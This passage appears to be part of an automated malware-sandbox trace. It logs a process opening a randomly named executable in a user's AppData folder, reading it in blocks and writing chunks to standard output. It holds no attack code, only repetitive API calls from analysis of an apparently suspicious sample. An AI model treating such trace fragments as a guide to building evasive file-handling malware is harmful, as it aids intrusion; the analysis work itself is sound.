(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18ddcc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0096.239] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] GetFileType (hFile=0x54) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=4) 
returned 0x54 [0096.239] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18de24 | out: lpFileSizeHigh=0x18de24*=0x0) returned 0x7d600 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.239] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] GetFileType (hFile=0x4c) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] GetFileType (hFile=0x4c) returned 0x1 [0096.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.239] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) 
returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] GetFileType (hFile=0x4c) returned 0x1 [0096.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.241] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.242] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, 
lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.242] GetFileType (hFile=0x4c) returned 0x1 [0096.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.243] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.243] GetFileType (hFile=0x4c) returned 0x1 [0096.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, 
lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.244] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.244] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.244] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.245] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, 
lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] GetFileType (hFile=0x4c) returned 0x1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.245] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.245] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 
| out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.309] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.309] GetFileType (hFile=0x4c) returned 0x1 [0096.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0096.310] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.310] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.310] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.310] GetFileType (hFile=0x4c) returned 0x1 [0096.310] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 
[0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] GetFileType (hFile=0x4c) returned 0x1 [0096.311] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.311] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.311] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.311] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.311] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
